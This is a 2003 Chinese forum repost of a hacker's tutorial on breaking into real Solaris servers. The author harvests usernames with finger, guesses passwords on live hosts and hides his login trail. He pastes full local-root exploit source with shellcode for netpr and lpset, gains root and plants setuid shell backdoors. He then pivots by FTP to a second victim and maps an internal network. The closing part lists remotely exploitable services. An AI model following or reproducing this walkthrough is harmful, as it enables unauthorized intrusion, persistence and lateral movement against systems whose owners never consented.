LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 2129|回复: 10

UNIX入侵过程zt

[复制链接]
发表于 2003-6-7 16:52:26 | 显示全部楼层 |阅读模式
UNIX入侵过程zt

作者序言:



本来很久以前说要写篇sunos 入侵教程的,但一直都没空,也没兴趣写。

说到就要做到。今天有点无聊的感觉,写点东西吧。

不过,这是我的最后一篇入侵教程。

黑来黑去有什么意思呢,我觉得还是写些技术分析的文章好些。

希望新手们看了我的这最后一篇入侵教程,能找到一些感觉。

这只是一篇写给新手的入门教程,不是新手的免看。

***请不要入侵和破坏国内的网络***





说明:



因为某些原因,把涉及到的IP全部换成了192.168.0.*

下面是所用到的系统列表的说明:

192.168.0.1     Windows 2000 advanced server

192.168.0.2      Solaris 7 sparc , gcc

192.168.0.3      Solaris 5.6 sparc

192.168.0.4      Solaris 8 sparc

192.168.0.10     irix 6.5.8

192.168.0.20     redhat 6.2



注:Solaris 也就是Sun os,他们的转换是:

Solaris 8 = Sunos 5.8,Solaris 7 = Sunos 5.7,Solaris 2.6 =Sunos 5.6,Solaris 2.5 =Sunos 5.5...

(你使用的平台最好为NT\Win2000\Linux\Unix,这里我用的是Win2000 ,192.168.0.1)

约定:

文章里面的“(***文字***)”是对该行命令或信息的一些说明。

所用到的工具为:

SuperScan 3.0 http://www.cnhonker.com/tmp/SuperScan.zip

SecureCRT 3.3 http://www.cnhonker.com/tmp/SecureCRT3.3.zip

里面所用到的有些程序代码请到http://lsd-pl.net/http://www.hack.co.za 查找。





入侵故事的开始



我喜欢把肉鸡列表放在桌面上,而每次重装系统总是会忘记备份桌面上的东西。

记得有次重装系统丢了500多台各种肉鸡的列表,有时候想起来就觉得心痛,真可惜啊。

M$的东西真是破兼可恶,又一次重装系统完毕,我再一次丢了列表。

幸好,这次的肉鸡不算多,但是我的Gcc,又得重新找,可怜啊。

如果不是这次重装系统,可能这篇教程也不会写了吧。

花点时间找几台机器吧,没机器用可不行啊。

你也跟着我来找找吧。



土办法,要获得第一个帐号,最简单的就是用finger 了。(其实,厚着脸皮向人要是最简单的办法。:))

扫网段端口用什么好呢,给大家一个介绍。SuperScan 3.0

大家可以在http://www.cnhonker.com/tmp/SuperScan.zip 得到我亲自汉化的3.0版本。



(ps:

有幸与小榕成为同事,得到了一个特殊版本的流光。这里顺便也为他的流光做做广告,我觉得流光对新手来说,流光是
最好的工具了。记得去年9月份自己刚开始学习NT/Win2000的攻击的时候,就常用流光来扫网段,有人说 lion=只会用流
光的家伙,呵呵J其实我已经很久没用过流光了,就是去年9,10月份比较常用些。现在我对新版本的流光感觉很好,功能
很多,里面的很多功能都很不错,特别是finger 探测和猜解,很适合新手使用,大家不妨试试。最新版本的流光可以在
小榕的网站获得:http://www.netxeyes.com



很多人对我的个人情况感兴趣,在这里也顺便说一下我个人的成长经历吧,看了大家别笑哦,其实是这样的:

2000年3月8日到广州实习,开始上网,开始学用IE,用email收发信件;

4月建立了个人网站,当时还只会用木马;

5月学习Sunos 系统的攻击,当时对提升权限等还一窍不通,不过这个月份我发现了www.elong.com的邮件系统绕过口令验
证的严重漏洞;

6月回学校毕业答辩;

7月在广州开始专职搞网页设计;

8月对Sunos 系统攻击有了一定的了解;

9月换了家公司,安装了自己的第一个win2000,并学习使用和尝试攻击;

10月专职于网络安全工作;

11月初碰linux,当时也在学习各种攻击手段和各种系统的攻击方法;

12月建立红客联盟网站。

2001年1月回家过春节;

2月组织攻击日本;

3月慢慢对攻击系统失去了兴趣;

4月在考虑很多东西;

5月组织对美网络反击战,结束后北上北京;

6月枯燥无味的一个月;

7月已经或者将要做几个大的决定。

送给各位网友两句话:

“人要靠自己”

“我就是我”

其实这两句话也就是我的全部。)



发了一通牢骚,开始我们的学习历程吧。

哦,慢着,新手们先去看看我几个月前写的三篇UNIX入侵教程,看完了再继续。

准备好了吗?

让我们来揭开UNIX神秘的面纱…

come on baby…

第一天:





好不容易等到下班。

打开SuperScan 3.0,(列表文件没找到错误,可以点击端口设置,再选导入,选好此软件目录里的scanner..lst ,
点击完成。)在IP栏中输入你要扫描的网段,建议每次扫描在10个C段以内,在扫描类型中选中“显示主机的响应”一
栏,如果你的网速慢,把“只扫描能ping的主机”也打上勾,选中“所有端口从”那个单选项,然后在框里输入开始和
结束的端口,这里都填“79”,也就是finger的端口,最后点“开始”进行扫描。



扫描完成后,点“剪除”去掉没开79端口的主机列表,点“散开”或者点“保存”把结果存为文本文件以便分析扫描结果。

我们通常可以看到如下几种常见的主机响应:

1. … Line User Host(s) Idle Location..

2. No one logged on.

3. Login Name TTY Idle When Where..

4. 其他响应消息或者没有内容。

其中,我们只把2,3这两种的机器找出来。

现在我们开始手工找机器,或者用流光探测finger。

手工找其实也有窍门的,但很难说清楚,这里就一律用 finger 0@ip 来找SunOS的薄弱机器。下面的IP都用xxx.xxx.xxx.xxx代替。





-------------------------------------------------test--------------------------------------------------------------

C:\>finger 0@xxx.xxx.xxx.xxx



[xxx.xxx.xxx.xxx]

finger: 0: no such user.

-------------------------------------------------test--------------------------------------------------------------





失败,这个系统应该是linux,别灰心,我们继续找。





-------------------------------------------------test--------------------------------------------------------------

C:\>finger 0@xxx.xxx.xxx.xxx



[xxx.xxx.xxx.xxx]

Login Name TTY Idle When Where

daemon ??? < . . . . >

bin ??? < . . . . >

sys ??? < . . . . >

jeffrey ??? pts/0 203.66.149.11

daniel ??? 437 114cm.kcable.

jamie ??? 0 203.66.162.68

postgres ??? pts/2 203.66.162.80

nsadmin ??? 768 203.66.19.50

ho ??? 390 61.169.209.106

house18 ??? pts/1 203.66.250.1

tong ??? pts/0 210.226. 42.69

jliu ??? pts/0 203.66.52.87

ptai ??? < . . . . >

-------------------------------------------------test--------------------------------------------------------------





我们需要的就是这种,:)其中,第一列的jeffrey,Daniel,Jamie,postgres等就是这个主机上的用户名,其他的内容都是一
些用户的登陆信息。



现在,我们来测试一下这些帐号的密码强度。(大家最好利用这些用户和一些密码猜解的工具配合来做,不然会感到厌倦的,
不过我以前特别喜欢猜: test:test oracleracle ….猜密码的感觉还不错。)





-------------------------------------------------test--------------------------------------------------------------

C:\>telnet xxx.xxx.xxx.xxx



SunOS 5.6 (***目标系统是SunOS 5.6 也就是Solaris 2.6***)



login: ptai (***输入用户名***)

Password: **** (***输入密码***)

Login incorrect (***登陆失败***)

login: jliu

Password:

Login incorrect

$ login: tong

Password:

Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***这个用户上次登陆时的IP***)

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

You have mail. (***HOHO~登陆成功啦***)

$ uname –a (***查看系统版本和补丁信息***)

SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10

$ set (***查看一些系统变量信息***)

HOME=/export/home/tong

HZ=100

IFS=

LOGNAME=tong

MAIL=/var/mail/tong

MAILCHECK=600

OPTIND=1

PATH=/usr/bin:

PS1=$

PS2=>

SHELL=/bin/sh

TERM=ansi

TZ=Hongkong

$ gcc

gcc: not found (***可恶,没有编译器,我们继续找其他机器吧,等会回来收拾它。***)

$ telnet localhost (*** telnet一下本地,以免这个用户下次登陆时一下发现了IP问题***)

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.





SunOS 5.6



login: tong

Password:

Last login: Wed Jul 4 17:56:09 from 211.99.42.226

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

You have mail.

$ exit

Connection closed by foreign host.

$ exit



遗失对主机的连接。

C:\>

-------------------------------------------------test--------------------------------------------------------------





我们继续猜解,若干时间过后,还不给我找到一个。:)

这台主机的IP用192.168.0.2代替啦。





-------------------------------------------------test--------------------------------------------------------------

C:\>finger 0@192.168.0.2



[192.168.0.2]

Login Name TTY Idle When Where

daemon ??? < . . . . >

bin ??? < . . . . >

sys ??? < . . . . >

dennis ??? pts/5 pcd209117.netvig

oracle ??? pts/5 o2

qwork ??? < . . . . >

kenneth1 ??? pts/4 cm61-18-172-213.

wing ??? pts/6 11 Wed 18:02 office

wilson ??? pts/11 203.66.200.90

srini ??? 363 office

eric ??? pts/8 office

render7 ??? 62 211.18.109.186

delex ??? < . . . . >

render9 ??? 023 office



C:\>telnet 192.168.0.2



SunOS 5.7



login: render9

Password:

Login incorrect

login: delex

Password:

*********************************************************



# The JRun is now replaced by JServ

# To restart the servlet server, please use



rs.sh



# However, as the JServ will reload those classes

# inside the "/usr/proj/gipex/class", you just

# need to remove the old class with the new one.



*********************************************************

$ w

6:19pm up 61 day(s), 3:40, 3 users, load average: 0.11, 0.07, 0.10

User tty login@ idle JCPU PCPU what

root console 4May0161days 2 2 /usr/dt/bin/sdt_shell -c ?

u

root pts/4 Fri 4pm 5days tail -f syslog

delex pts/7 6:19pm w

$ uname -a

SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10

$w

4:24pm up 62 day(s), 1:45, 3 users, load average: 0.02, 0.02, 0.02

User tty login@ idle JCPU PCPU what

root console 4May0162days 2 2 /usr/dt/bin/sdt_shell -c ? u

root pts/4 Fri 4pm 6days tail -f syslog

$ gcc

gcc: No input files

-------------------------------------------------test--------------------------------------------------------------





HOHO~终于找到一台有编译器的SunOS啦

现在我们来简单找找前面有没有入侵者。:)





-------------------------------------------------test--------------------------------------------------------------

$ ls -al

total 14

drwxrwxr-x 2 delex staff 512 Jul 4 18:28 .

drwxr-xr-x 35 root root 1024 May 7 10:46 ..

-rw-r--r-- 1 delex staff 144 May 2 10:46 .profile

-rw------- 1 root staff 320 Jul 4 18:52 .sh_history

-rw-r--r-- 1 delex staff 124 May 2 10:46 local.cshrc

-rw-r--r-- 1 delex staff 581 May 2 10:46 local.login

-rw-r--r-- 1 delex staff 562 May 2 10:46 local.profile

$ cat /etc/passwd (***检查/etc/passwd***)

root:x:0:1:Super-User:/:/sbin/sh

daemon:x:1:1::/:

bin:x:2:2::/usr/bin:

sys:x:3:3::/:

adm:x:4:4:Admin:/var/adm:

lp:x:71:8ine Printer Admin:/usr/spool/lp:

uucp:x:5:5:uucp Admin:/usr/lib/uucp:

nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:Nobody:/:

noaccess:x:60002:60002:No Access User:/:

nobody4:x:65534:65534:SunOS 4.x Nobody:/:

dennis:x:1005:20::/export/home/dennis:/bin/sh

oracle:x:1001:100::/export/home/oracle:/bin/sh

render7:x:9589:101::/export/home/render7:/bin/sh

delex:x:1035:20::/export/home/delex:/bin/sh

ac1:x:3000:300:Agent Client 1:/export/home/ac1:/bin/sh

ac2:x:3001:300:Agent Client 2:/export/home/ac2:/bin/sh

render9:x:9591:101::/export/home/render9:/bin/sh

$ ls -al / (***查看根目录是否有.rhosts等文件***)

total 381

drwxrwxrwx 35 root root 1024 Jun 29 16:52 .

drwxrwxrwx 35 root root 1024 Jun 29 16:52 ..

-rw------- 1 root other 152 May 4 14:39 .Xauthority

drwxrwxr-x 4 root other 512 Feb 20 10:33 .cpan

-rw------- 1 root root 1032 May 4 14:39 .cpr_config

-rw-r--r-- 1 root other 947 Apr 14 2000 .desksetdefaults

drwxr-xr-x 15 root other 512 Jun 20 13:09 .dt

-rwxr-xr-x 1 root other 5111 Apr 13 2000 .dtprofile

drwx------ 5 root other 512 Apr 14 2000 .fm

drwxr-xr-x 2 root other 512 Apr 13 2000 .hotjava

drwxr-xr-x 4 root other 512 Mar 14 17:42 .netscape

-rw------- 1 root other 1024 Dec 8 2000 .rnd

-rw-rw-r-- 1 nobody staff 402 Jun 12 11:14 .svg

drwx------ 2 root other 512 Apr 13 2000 .wastebasket

drwx------ 2 root other 512 Apr 13 2000 DeadLetters

drwx------ 2 root other 512 Apr 13 2000 Mail

drwxr-xr-x 2 root root 512 Apr 13 2000 TT_DB

drwxrwxr-x 2 moluk other 512 Dec 25 2000 XYIZNWSK

lrwxrwxrwx 1 root root 9 Apr 13 2000 bin -> ./usr/bin

drwxr-xr-x 2 root nobody 512 Jun 20 13:19 cdrom

-rw------- 1 root other 77 Jun 7 15:03 dead.letter

drwxrwxr-x 18 root sys 3584 May 4 14:39 dev

drwxrwxr-x 4 root sys 512 Apr 13 2000 devices

drwxr-xr-x 9 root root 512 Jun 12 14:47 disk2

drwxr-xr-x 32 root sys 3584 Jul 4 18:53 etc

drwxrwxr-x 3 root sys 512 Apr 13 2000 export

dr-xr-xr-x 1 root root 1 May 4 14:39 home

drwxr-xr-x 9 root sys 512 Dec 20 2000 kernel

lrwxrwxrwx 1 root root 9 Apr 13 2000 lib -> ./usr/lib

drwx------ 3 root root 8192 Apr 13 2000 lost+found

drwxrwxr-x 2 root sys 512 Apr 13 2000 mnt

dr-xr-xr-x 1 root root 1 May 4 14:39 net

-rw-rw-r-- 1 nobody staff 13 Feb 20 16:53 newsletteradminmail.ost

drwx------ 2 root other 512 May 6 2000 nsmail

drwxrwxr-x 7 root sys 512 Apr 28 2000 opt

drwxr-xr-x 12 root sys 512 Apr 13 2000 platform

dr-xr-xr-x 192 root root 126912 Jul 4 19:00 proc

drwxrwxr-x 2 root sys 512 Dec 20 2000 sbin

drwxrwxr-x 2 root 10 512 Feb 15 14:50 snap

drwxrwxrwt 7 sys sys 986 Jul 4 19:00 tmp

drwxrwxr-x 29 root sys 1024 May 3 17:32 usr

drwxr-xr-x 26 root sys 512 Jun 12 14:49 var

dr-xr-xr-x 6 root root 512 May 4 14:39 vol

drwxr-xr-x 2 wing 10 512 Nov 6 2000 web

dr-xr-xr-x 1 root root 1 Jul 4 18:55 xfn

$ find / -user root -perm -4000 -exec ls -al {} \;

-r-s--x--x 1 root bin 19564 Sep 1 1998 /usr/lib/lp/bin/netpr

-r-sr-xr-x 1 root bin 15260 Oct 6 1998 /usr/lib/fs/ufs/quota

-r-sr-sr-x 1 root tty 174352 Nov 6 1998 /usr/lib/fs/ufs/ufsdump

-r-sr-xr-x 1 root bin 856064 Nov 6 1998 /usr/lib/fs/ufs/ufsrestore

---s--x--x 1 root bin 4316 Oct 6 1998 /usr/lib/pt_chmod

-r-sr-xr-x 1 root bin 8576 Oct 6 1998 /usr/lib/utmp_update

-rwsr-xr-x 1 root adm 5304 Sep 1 1998 /usr/lib/acct/accton

-r-sr-xr-x 1 root bin 643464 Sep 1 1998 /usr/lib/sendmail



…. (***结果太多这里省略了,主要是简单找找有没有其他以前的入侵者。***)



$ps –ef

UID PID PPID C STIME TTY TIME CMD

root 0 0 0 May 04 ? 0:01 sched

root 1 0 0 May 04 ? 1:03 /etc/init -

root 2 0 0 May 04 ? 0:01 pageout

root 3 0 1 May 04 ? 476:33 fsflush

root 225 1 0 May 04 ? 0:01 /usr/lib/utmpd

root 115 1 0 May 04 ? 0:01 /usr/sbin/rpcbind

root 299 1 0 May 04 ? 0:00 /usr/lib/saf/sac -t 300

root 52 1 0 May 04 ? 0:00 /usr/lib/devfsadm/devfseventd

root 54 1 0 May 04 ? 0:00 /usr/lib/devfsadm/devfsadmd

root 117 1 0 May 04 ? 0:00 /usr/sbin/keyserv

root 239 1 0 May 04 ? 0:13 /usr/lib/inet/xntpd

root 142 1 0 May 04 ? 0:11 /usr/sbin/inetd -s

root 163 1 0 May 04 ? 2:50 /usr/sbin/in.named

root 164 1 0 May 04 ? 0:01 /usr/lib/autofs/automountd

daemon 153 1 0 May 04 ? 0:00 /usr/lib/nfs/statd

root 275 1 0 May 04 ? 0:01 /usr/lib/nfs/mountd

root 152 1 0 May 04 ? 0:00 /usr/lib/nfs/lockd





$ netstat -an|grep LISTEN (***查看有没有可疑端口***)

*.111 *.* 0 0 0 0 LISTEN

*.21 *.* 0 0 0 0 LISTEN

*.23 *.* 0 0 0 0 LISTEN

*.514 *.* 0 0 0 0 LISTEN

*.513 *.* 0 0 0 0 LISTEN

*.512 *.* 0 0 0 0 LISTEN

*.540 *.* 0 0 0 0 LISTEN

*.79 *.* 0 0 0 0 LISTEN

*.37 *.* 0 0 0 0 LISTEN

*.7 *.* 0 0 0 0 LISTEN

*.9 *.* 0 0 0 0 LISTEN

*.13 *.* 0 0 0 0 LISTEN

*.19 *.* 0 0 0 0 LISTEN

….

$…(***省略了对端口进行的一番测试,看有没有bind suid root shell port ***)



$ cd /tmp

$ ls -al

total 1314

drwxrwxrwt 7 sys sys 986 Jul 4 19:00 .

drwxrwxrwx 35 root root 1024 Jun 29 16:52 ..

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix

drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia

drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable

drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class

-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0

-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb

-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf

-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data

-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399

-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock

-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data

$strings /bin/login



$… (***这里省略了对一些文件的简单测试****)



-------------------------------------------------test--------------------------------------------------------------





基本上没发现什么问题,来提升我们的权限吧。:)





-------------------------------------------------test--------------------------------------------------------------

$ set

EDITOR=vi

HOME=/export/home/delex

HZ=100

IFS=



LD_LIBRARY_PATH=/export/home/software/setadapters/solaris2/cgi-bin/lib:

LOGNAME=delex

MAIL=/usr/mail/delex

MAILCHECK=600

MANPATH=:/usr/share/man:/usr/local/man

OPTIND=1

PATH=/usr/bin::/usr/bin:/usr/local/bin:/usr/bin:/usr/ucb:/usr/ccs/bin:/usr/sbin:/usr/local:/usr/local/bin
:/export/home/oracle/product/8.1.6/bin

PS1=$

PS2=>

SHELL=/bin/sh

TERM=vt100

TZ=Hongkong

_INIT_PREV_LEVEL=S

_INIT_RUN_LEVEL=3

_INIT_RUN_NPREV=0

_INIT_UTS_ISA=sparc

_INIT_UTS_MACHINE=sun4u

_INIT_UTS_NODENAME=develop

_INIT_UTS_PLATFORM=SUNW,Ultra-5_10

_INIT_UTS_RELEASE=5.7

_INIT_UTS_SYSNAME=SunOS

_INIT_UTS_VERSION=Generic_106541-14

$ uname -a

SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10

$ cd /tmp

$ cat > test.c (***用cat命令写一个文件***)






/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/

/*## /usr/lib/lp/bin/netpr #*/



/* requires to specify the address of a host with 515 port opened */



#define NOPNUM 4000

#define ADRNUM 1200

#define ALLIGN 3



char shellcode[]=

"\x20\xbf\xff\xff" /* bn,a */

"\x20\xbf\xff\xff" /* bn,a */

"\x7f\xff\xff\xff" /* call */

"\x90\x03\xe0\x20" /* add %o7,32,%o0 */

"\x92\x02\x20\x10" /* add %o0,16,%o1 */

"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */

"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */

"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */

"\x82\x10\x20\x0b" /* mov 0xb,%g1 */

"\x91\xd0\x20\x08" /* ta 8 */

"/bin/ksh"

;



char jump[]=

"\x81\xc3\xe0\x08" /* jmp %o7+8 */

"\x90\x10\x00\x0e" /* mov %sp,%o0 */

;



static char nop[]="\x80\x1c\x40\x11";



main(int argc,char **argv){

char buffer[10000],adr[4],*b,*envp[2];

int i;



printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/\n");

printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc\n\n");



if(argc==1){

printf("usage: %s lpserver\n",argv[0]);

exit(-1);

}



*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;



envp[0]=&buffer[0];

envp[1]=0;



b=&buffer[0];

sprintf(b,"xxx=");

b+=4;

for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;

for(i=0;i
for(i=0;i
*b=0;



b=&buffer[5000];

for(i=0;i
for(i=0;i
*b=0;



execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],

"-p",&buffer[5000],"/bin/sh",0,envp);

}

^D (***这里是按ctrl + d 结束写文件,你用vi来写也可以,ftp,rcp等上传也可以。***)

(***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_netpr ***)

$ ls -al /tmp (***查看test.c是否建立***)

total 1330

drwxrwxrwt 7 sys sys 1049 Jul 4 19:07 .

drwxrwxrwx 35 root root 1024 Jun 29 16:52 ..

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix

drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia

drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable

drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class

-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0

-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb

-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf

-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data

-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399

-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock

-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c

-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data

$ gcc -o isbase test.c (***一般编译用这个方式就可以了,更多资料请查看帮助***)

$ ./test

copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/

/usr/lib/lp/bin/netpr solaris 2.7 sparc



usage: ./test lpserver

$ ./test localhost

copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/

/usr/lib/lp/bin/netpr solaris 2.7 sparc



# id

uid=1035(delex) gid=20(staff) euid=0(root) (***成功获得root***)

# mkdir /usr/lib/...

# cp /bin/ksh /usr/lib/…/.x (***做个简单的后门***)

# chmod +s /usr/lib/…/.x

# cat /etc/hosts (***看看这个网络多大***)

##################################################

## Gips Limited Server Hosts Names

## 2001-03-01 (develop)

##################################################

127.0.0.1 localhost loghost



##################################################

## Gipex (Internal - CITIC Back-End)

192.168.2.1 office-i2 gate-citic-backend

192.168.2.5 render1 render1-i1



##################################################

## Gipex (Internal - CITIC Office)

192.168.1.1 office-i1 gate-citic-office



##################################################

## Gipex (Internal - iLink)

192.168.100.1 backup-i1 gate-ilink-vpn

## .2 - .9

192.168.100.10 www1-i1

192.168.100.11 db1 db1-i1 www0-i1 www0 www0.xxwex.com

192.168.100.12 snap1

## .13

192.168.100.14 snap2

192.168.100.15 snap3

192.168.100.16 www2-i1 mail-i1

192.168.100.17 www2-i2 mail-i2

192.168.100.18 render2 render2-i1

192.168.100.19 render2-i2

## .20 - .252

192.168.100.253 switch1

## .254

# /usr/sbin/ping 192.168.100.253

ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)

for icmp from develop (192.168. 0.2) to www1-i1 (192.168.100.253)

ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)

for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)

ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)

for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)

^C (***局域网是连通的 ***)

#

-------------------------------------------------test--------------------------------------------------------------





以后有空再慢慢搞它的内部网吧

现在先回去把那台SunOS 5.6干掉。





-------------------------------------------------test--------------------------------------------------------------

# cat >lpset.c (***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_lpset ***)

/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland *://lsd-pl.net/ #*/

/*## /usr/bin/lpset #*/



#define NOPNUM 864

#define ADRNUM 132

#define ALLIGN 3



char shellcode[]=

"\x20\xbf\xff\xff" /* bn,a */

"\x20\xbf\xff\xff" /* bn,a */

"\x7f\xff\xff\xff" /* call */

"\x90\x03\xe0\x20" /* add %o7,32,%o0 */

"\x92\x02\x20\x10" /* add %o0,16,%o1 */

"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */

"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */

"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */

"\x82\x10\x20\x0b" /* mov 0xb,%g1 */

"\x91\xd0\x20\x08" /* ta 8 */

"/bin/ksh"

;



char jump[]=

"\x81\xc3\xe0\x08" /* jmp %o7+8 */

"\x90\x10\x00\x0e" /* mov %sp,%o0 */

;



static char nop[]="\x80\x1c\x40\x11";



main(int argc,char **argv){

char buffer[10000],adr[4],*b;

int i;



printf("copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net/\n");

printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");



*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;



b=buffer;

sprintf(b,"xxx=");

b+=4;

for(i=0;i<2;i++) *b++=0xff;

for(i=0;i
for(i=0;i
for(i=0;i
for(i=0;i
*b=0;



execle("/usr/bin/lpset","lsd","-n","xfn","-a",buffer,"printer",0,0);

}

^D



# gcc -o lpset lpset.c

/bin/ksh: gcc: not found

# exit

$ gcc -o lpset lpset.c

$ ls -al

total 1410

drwxrwxrwt 7 sys sys 1236 Jul 4 20:33 .

drwxrwxrwx 35 root root 1024 Jul 4 19:15 ..

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe

drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix

drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia

drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable

drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door

-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class

-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0

-rwxrwxr-x 1 delex staff 8572 Jul 4 20:33 lpset

-rw-rw-r-- 1 delex staff 1685 Jul 4 20:32 lpset.c

-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb

-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf

-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data

-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399

-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock

-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 isbase

-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c

-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data

$ ftp 192.168.0.3

Connected to 192.168.0.3.

220 dev01 FTP server (SunOS 5.6) ready.

Name (192.168.0.2:delex): tong

331 Password required for tong.

Password:

230 User tong logged in.

ftp> cd /tmp

250 CWD command successful.

ftp> bin (***设置上传模式为二进制***)

200 Type set to I.

ftp> put lpset

200 PORT command successful.

150 Binary data connection for lpset (192.168.0.2,49105).

226 Transfer complete.

local: lpset remote: lpset

8572 bytes sent in 0.00054 seconds (15617.71 Kbytes/s)

ftp> by

221 Goodbye.

$ telnet 192.168.0.3

Trying 192.168.0.3...

Connected to 192.168.0.3.

Escape character is '^]'.





SunOS 5.6



login: tong

Password:

Last login: Wed Jul 4 20:31:37 from 192.168.0.2

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

You have mail.

$ /tmp/lpset

/tmp/lpset: cannot execute

$ chmod 755 /tmp/lpset

$ /tmp/lpset

copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net/

/usr/bin/lpset for solaris 2.6 2.7 sparc



# id

uid=107(tong) gid=10(staff) euid=0(root) (***HOHO~死了没?***)

#mkdir /usr/lib/…

#cp /bin/ksh /usr/lib/…/.x

#chmod +s /usr/lib/…/.x

#exit

$ exit

Connection closed by foreign host. (***不管啦,脚印也不擦啦***)

$exit



遗失对主机的连接。

C:\>

-------------------------------------------------test--------------------------------------------------------------



哦,怎么不干了?断开连接了?连脚印都不擦?

嘿嘿,兄弟,现在是21:00啦,还要赶地铁呢。本来20:30就要走啦,明天继续吧,管不了那么多啦。大家先回去看我以前
的教程,温习一下该怎么擦PP。为了节省版面,这篇教程不会出现擦PP的啦,自己要懂得擦干净哦。:)

对了,明天要学习远程溢出的利用,然后找几台redhat回来。

回去啦,肚子也饿啦,明天见~~

zzzZZZZZZ~~~~~~~~





第二天:





嘿嘿,大家早上好~

今天上班好象有任务要分配,我先去问问。

稍等…



真惨,分配了任务。

不过,是从下个星期开始做。:)

所以今天就写教程吧。

不知道今天能不能写完这份教程呢。

我们继续。:)

昨天讲述了本地提升权限的方法,今天我们来说说远程溢出的利用。

几乎各种操作系统都有严重的远程溢出漏洞。

常见的有:

Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6 的rpc.ttdbserverd

Solaris 2.5, 2.5.1, 2.6, 7 的 rpc.cmsd

solaris 2.6, 7 的 sadmind

Solaris 7, 8 的 snmpXdmid

Redhat 6.0, 5.1, 4.0 的Amd

Redhat 6.2, 6.1, 6.0 的 rpc.statd

Redhat 7.0 的 LPRng



其它的系统就不在列举了。

除了系统本身存在问题外,还有一些第三方程序存在问题。

比如常见的FTP服务器Wu-ftp,版本2.6.0及以下都存在严重的远程溢出问题

比如DNS 服务器 bind,版本8.2.2及以下版本都存在严重的远程溢出问题。



可以利用的东西太多了,而要掌握这些则需要时间,需要靠经验的积累。

等经验丰富后,入侵一个简单的系统,只要得到对方的系统版本,然后扫描一下端口就足够了。因为这时候你已经对各
种系统和守护进程的弱点有了很详细的了解。





